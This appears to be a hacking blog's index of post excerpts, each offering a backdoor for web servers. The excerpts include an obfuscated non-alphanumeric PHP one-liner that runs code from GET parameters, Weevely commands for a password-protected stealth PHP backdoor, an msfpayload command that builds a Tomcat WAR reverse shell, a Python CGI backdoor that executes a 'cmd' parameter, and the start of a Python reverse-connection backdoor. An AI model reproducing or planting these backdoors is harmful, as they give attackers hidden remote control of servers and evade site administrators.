Non-alphanumeric PHP Simple Backdoor
After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor. <? $_="{"; #XOR char $_=($_^"<").($_^">").($_^"/"); #XOR = GET ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?> well, it’s a quite simple program, it’s just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result. put the result in one-liner code execution and done. Another version with “<pre>” tag. <? $_="{"; #XOR...
read moreSilent Backdoor with Weevely
Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5, and take a look on the orange char ): root@bt:~# cd /pentest/backdoors/web/weevely root@bt:/pentest/backdoors/web/weevely# ./main.py -g -p bD_p4ss -o bd.php Weevely 0.3 – Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Backdoor file ‘bd.php’ created with password...
read moreCreate a WAR backdoor with Metasploit
Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating the backdoor. dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell_reverse_tcp Length: 71 Options: {“LHOST”=>”172.16.96.1″} [stextbox id="info"]it will create a WAR file contain a random name for jsp backdoor file[/stextbox] 2. Upload the WAR file. 3. Use netcat to...
read moreCGI Backdoor for Linux with Python
#!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cgi.FieldStorage() cmd = form.getvalue('cmd', '') osexe = os.popen(cmd) dirt = os.getcwd()+'/' prognm = sys.argv[0].strip() progfl = re.findall(dirt+'(.*)',prognm)[0] osinf = os.uname() info='''==================================== CGI python backdoor ==================================== Author : otoy Date : 0x102010 Blog : <a href="http://otoyrood.wordpress.com"...
read moreReverse Connection Backdoor for Linux
#!/usr/bin/python #Info : This is a linux based reverse connection backdoor and # this is NOT an interactive Shell! #Author : otoy #Date : 0x102010 #Blog : otoyrood.wordpress.com import socket,sys,os,re #define osinf = os.uname() info='''==================================== py_backdoor ==================================== Author : otoy Date : 0x102010 Blog : otoyrood.wordpress.com ==================================== System : %s %s ==================================== ''' %(osinf[0], osinf[2]) def daemonize(): pid = os.fork() if(pid != 0): ...
read more